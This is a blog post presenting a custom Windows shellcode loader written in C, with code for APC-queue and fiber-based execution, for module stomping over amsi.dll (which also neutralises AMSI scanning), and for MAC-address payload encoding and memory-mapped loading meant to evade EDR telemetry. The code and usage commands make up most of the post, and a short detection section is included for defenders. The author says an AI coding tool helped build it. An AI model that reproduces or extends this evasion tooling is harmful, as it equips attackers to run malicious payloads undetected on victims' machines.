VibeLoader: Loading for Fun and No Profit

Shellcode loaders are one of the most fundamental pieces of offensive tooling. Every implant, every stager, every post-exploitation payload needs a way to get into memory and execute. The problem is, EDR vendors know this — and the classic VirtualAlloc + memcpy + CreateThread pattern is one of the most heavily monitored sequences in modern endpoint security.

VibeLoader is a custom shellcode loader I vibe coded with Claude Code and some manual development to explore practical evasion techniques and test different execution methods. It’s written in pure C with no external dependencies beyond the Windows API, and it implements three distinct execution methods with increasing levels of stealth. Some choices prioritize OPSEC, others are more exploratory — I’ll call out which is which as we go.

This post walks through the design, the execution techniques, and the trade-offs behind each decision.

Design Principles

These are the concepts I wanted to test with and implement. Not all of them are fully hardened — some are starting points that could be taken further.

Never use RWX memory — Allocate as RW, copy shellcode, then flip to RX. RWX pages are anomalous and a dead giveaway to memory scanners. This is a fundamental OPSEC principle worth building into any loader from the start.
Avoid CreateThread / CreateRemoteThread — These are among the most monitored APIs in any EDR. I wanted to explore alternative execution methods and understand why they’re harder to detect.
Clean up — Zero memory before freeing. This prevents shellcode from being recovered in a memory dump post-execution.
Minimize file I/O footprint — Use memory-mapped I/O instead of standard file reads where possible. This was an experiment to see how different I/O methods generate different telemetry.
Support payload obfuscation — Raw shellcode on disk is signature bait. VibeLoader uses MAC address encoding as an exploratory technique, but encoding is not encryption — the bytes are reformatted, not protected. In practice, AES or XOR encryption with environment-keyed decryption at runtime is the OPSEC-safe choice.

Execution Methods

VibeLoader supports three execution techniques, selectable at runtime. Each trades off simplicity for stealth.

Method 1: APC Queue

The default method. Instead of creating a new thread, we queue an Asynchronous Procedure Call to the current thread and enter an alertable wait state. When the thread becomes alertable, Windows processes the APC — which points to our shellcode.

// Duplicate current thread handle
DuplicateHandle(
    GetCurrentProcess(),
    GetCurrentThread(),
    GetCurrentProcess(),
    &hThread,
    0, FALSE,
    DUPLICATE_SAME_ACCESS
);

// Queue shellcode as APC callback
QueueUserAPC((PAPCFUNC)execMemory, hThread, 0);

// Enter alertable wait — APC fires here
SleepEx(0, TRUE);

Why it works: No new threads are created. The shellcode runs in the context of the existing thread via the APC mechanism, which is a legitimate Windows feature designed for asynchronous callbacks. EDR products that focus on thread creation events won’t see this.

Trade-off: EDR can still monitor QueueUserAPC calls and alertable sleep patterns. This is medium evasion — effective against basic detection but not against mature EDR products that hook APC functions.

Method 2: Fiber-Based Execution

Fibers are user-mode cooperative threading primitives. They’re scheduled entirely in user space — the kernel has no visibility into fiber switches. This makes them an excellent execution vehicle for shellcode.

// Convert main thread to fiber
LPVOID originalFiber = ConvertThreadToFiber(NULL);

// Setup fiber context
FIBER_CONTEXT fiberCtx = {0};
fiberCtx.shellcodeAddress = execMemory;
fiberCtx.originalFiber = originalFiber;
fiberCtx.executionComplete = FALSE;

// Create shellcode fiber
LPVOID shellcodeFiber = CreateFiber(0, ShellcodeFiberProc, &fiberCtx);

// Switch execution to shellcode
SwitchToFiber(shellcodeFiber);

// Cleanup after execution returns
DeleteFiber(shellcodeFiber);
ConvertFiberToThread();

The fiber callback is straightforward — execute the shellcode, mark completion, switch back:

VOID CALLBACK ShellcodeFiberProc(LPVOID lpParameter) {
    PFIBER_CONTEXT ctx = (PFIBER_CONTEXT)lpParameter;

    ((void(*)())ctx->shellcodeAddress)();

    ctx->executionComplete = TRUE;
    SwitchToFiber(ctx->originalFiber);
}

Why it works: Fiber scheduling happens entirely in user mode. There are no kernel transitions during SwitchToFiber, which means kernel-level thread monitoring is blind to the execution. Most EDR products don’t instrument fiber APIs because they’re rarely used in legitimate software — which is exactly what makes them useful for us.

Trade-off: Some next-gen EDR products have started hooking ConvertThreadToFiber and CreateFiber. The technique is gaining awareness, but it’s still less monitored than thread-based execution.

Method 3: Module Stomping

The highest evasion method. Instead of allocating new memory, we overwrite the executable section of a legitimate DLL that’s already loaded in the process. The shellcode runs from the DLL’s .text section, so the call stack points to a signed, trusted module.

const char* targetDll = "amsi.dll";

// Load the target DLL
HMODULE hModule = LoadLibraryA(targetDll);

// Parse PE headers to find .text section
PIMAGE_DOS_HEADER dosHeader = (PIMAGE_DOS_HEADER)hModule;
PIMAGE_NT_HEADERS ntHeaders = (PIMAGE_NT_HEADERS)((BYTE*)hModule + dosHeader->e_lfanew);
PIMAGE_SECTION_HEADER sectionHeader = IMAGE_FIRST_SECTION(ntHeaders);

// Find executable section
for (int i = 0; i < ntHeaders->FileHeader.NumberOfSections; i++) {
    if (sectionHeader->Characteristics & IMAGE_SCN_MEM_EXECUTE) {
        targetAddress = (LPVOID)((BYTE*)hModule + sectionHeader->VirtualAddress);
        targetSize = sectionHeader->Misc.VirtualSize;
        break;
    }
    sectionHeader++;
}

// Flip to RW, write shellcode, restore to RX
VirtualProtect(targetAddress, size, PAGE_READWRITE, &oldProtect);
memcpy(targetAddress, shellcode, size);
VirtualProtect(targetAddress, size, PAGE_EXECUTE_READ, &temp);

// Execute from the DLL's .text section
((void(*)())targetAddress)();

Why it works: When the shellcode executes, the instruction pointer is inside amsi.dll’s .text section. Any call stack analysis shows execution originating from a legitimate Microsoft DLL, not from a suspicious VirtualAlloc’d memory region. This bypasses code origin validation and many behavioral detection rules.

Trade-off: Module integrity monitoring can catch this — some EDR products compare loaded module sections against their on-disk counterparts. Also, the target DLL’s original functionality is destroyed for the lifetime of the process.

The choice of amsi.dll is deliberate — it’s the Antimalware Scan Interface, and overwriting it has the side effect of neutralizing AMSI-based script scanning in the process.

Memory Management

Every execution method follows the same memory protection lifecycle:

// Stage 1: Allocate RW memory
LPVOID mem = VirtualAlloc(NULL, size, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);

// Stage 2: Copy shellcode
memcpy(mem, shellcode, size);

// Stage 3: Flip to RX (NEVER RWX)
VirtualProtect(mem, size, PAGE_EXECUTE_READ, &oldProtect);

The RW → RX pattern is critical. RWX (read-write-execute) pages are extremely rare in legitimate software and are one of the first things memory scanners flag. By splitting the allocation into two protection stages, we avoid this indicator entirely.

On cleanup, memory is zeroed before being freed:

void CleanupExecutableMemory(LPVOID execMemory, SIZE_T size) {
    if (execMemory) {
        SecureZeroMemory(execMemory, size);
        VirtualFree(execMemory, 0, MEM_RELEASE);
    }
}

SecureZeroMemory prevents the compiler from optimizing away the zeroing operation. This ensures shellcode bytes can’t be recovered from a memory dump after execution.

Payload Obfuscation: MAC Address Encoding

Raw shellcode sitting on disk is trivially signature-able. VibeLoader supports loading payloads encoded as MAC addresses — each MAC address stores 6 bytes of shellcode data. This was more of an exploratory exercise than an OPSEC-first decision — I wanted to test out the MAC obfuscation technique and see how it works in practice.

The encoding is done with a Python helper:

def encode_to_mac_addresses(data, separator=':'):
    mac_addresses = []
    for i in range(0, len(data), 6):
        chunk = data[i:i+6]
        if len(chunk) < 6:
            chunk = chunk + b'\x00' * (6 - len(chunk))
        mac_addr = separator.join(f'{b:02X}' for b in chunk)
        mac_addresses.append(mac_addr)
    return mac_addresses

# Encode a payload
python3 mac_encode.py payload.bin macs.txt

# Load with VibeLoader
loader.exe -mac macs.txt -m 2

The encoded file looks like network configuration data:

FC:48:81:E4:F0:FF
FF:FF:E8:D0:00:00
00:41:51:41:50:52
51:56:48:31:D2:65

The loader parses each line back into 6 bytes and reconstructs the original shellcode in memory. The encoding breaks up the binary pattern on disk, but it’s important to note — encoding is not encryption. The shellcode bytes are still there in plaintext, just reformatted. Any analyst who recognizes the MAC address pattern can trivially decode it back to the original payload.

For a real engagement, the more OPSEC-safe approach is runtime encryption — AES or XOR with a key derived at execution time (environment-keying, remote key fetch, etc.). The payload is unreadable on disk and only decrypted in memory right before execution. MAC encoding was a fun technique to implement and test, but encryption is what you’d reach for when it matters.

File I/O: Memory-Mapped Loading

For direct binary payloads, VibeLoader uses memory-mapped I/O instead of standard ReadFile calls:

HANDLE hFile = CreateFileA(filename, GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, 0, NULL);
HANDLE hMapping = CreateFileMappingA(hFile, NULL, PAGE_READONLY, 0, 0, NULL);
LPVOID mappedView = MapViewOfFile(hMapping, FILE_MAP_READ, 0, 0, 0);

// Copy from mapped view
memcpy(buffer, mappedView, fileSize);

UnmapViewOfFile(mappedView);

Memory-mapped I/O flows through the Windows memory management subsystem rather than the file I/O path. This generates different telemetry than a ReadFile call and can bypass file activity monitoring that only hooks the standard I/O APIs.

Usage

# Basic: load and execute with default APC method
loader.exe payload.bin

# Fiber-based execution
loader.exe -m 2 payload.bin

# Module stomping with verbose output
loader.exe -m 3 -v payload.bin

# MAC-encoded payload with fiber execution
loader.exe -mac macs.txt -m 2

# Pause before execution (useful for attaching debugger)
loader.exe -p -v payload.bin

# Skip cleanup (keep shellcode in memory)
loader.exe -n payload.bin

Building

VibeLoader compiles with MinGW for cross-compilation from Linux or with MSVC on Windows:

# Linux (MinGW cross-compilation)
make

# Windows (Visual Studio x64 Native Tools Command Prompt)
build.bat

The MinGW build links against ntdll, winhttp, and cabinet for NT API access and potential future staging capabilities.

Detection Considerations

No loader is undetectable. Here’s what defenders can look for:

Memory protection transitions — The RW → RX pattern, while better than RWX, is still detectable by EDR products that monitor VirtualProtect calls on newly allocated memory.
APC + alertable sleep — The QueueUserAPC followed by SleepEx(0, TRUE) pattern is a known indicator, though less signatured than thread creation.
Fiber API usage — ConvertThreadToFiber and CreateFiber are uncommon in legitimate software, which makes them anomalous.
Module section modification — Any VirtualProtect call on a loaded DLL’s .text section is highly suspicious. Module integrity checks will catch this.
MAC address file format — The encoding format is signature-able if analyzed as structured text.

The value isn’t in being undetectable — it’s in understanding the detection surface and making informed decisions about which trade-offs to accept for a given engagement.

What’s Next

VibeLoader is a foundation. There’s plenty of room to extend it:

Anti-analysis checks — Pre-execution environment validation to detect sandboxes, debuggers, and VMs before running. Layer hardware checks (CPU cores, RAM, uptime), process scanning for analyst tools, and user interaction validation. I covered these techniques in the anti-analysis section of the Modern C2 Usage post.
Indirect syscalls — Replace VirtualAlloc/VirtualProtect with indirect NT syscalls to bypass user-mode hooks
Encrypted payloads — AES/XOR encryption with key derivation at runtime instead of static encoding
Remote staging — Pull payloads over HTTPS instead of reading from disk
Sleep obfuscation — Encrypt the shellcode in memory between callbacks using Ekko/Foliage techniques
PPID spoofing — Spawn sacrificial processes with spoofed parent PIDs for injection targets

Each of these deserves its own deep dive, which I’ll cover in future posts. For now, the source is available at github.com/zachmarmolejo/VibeLoader.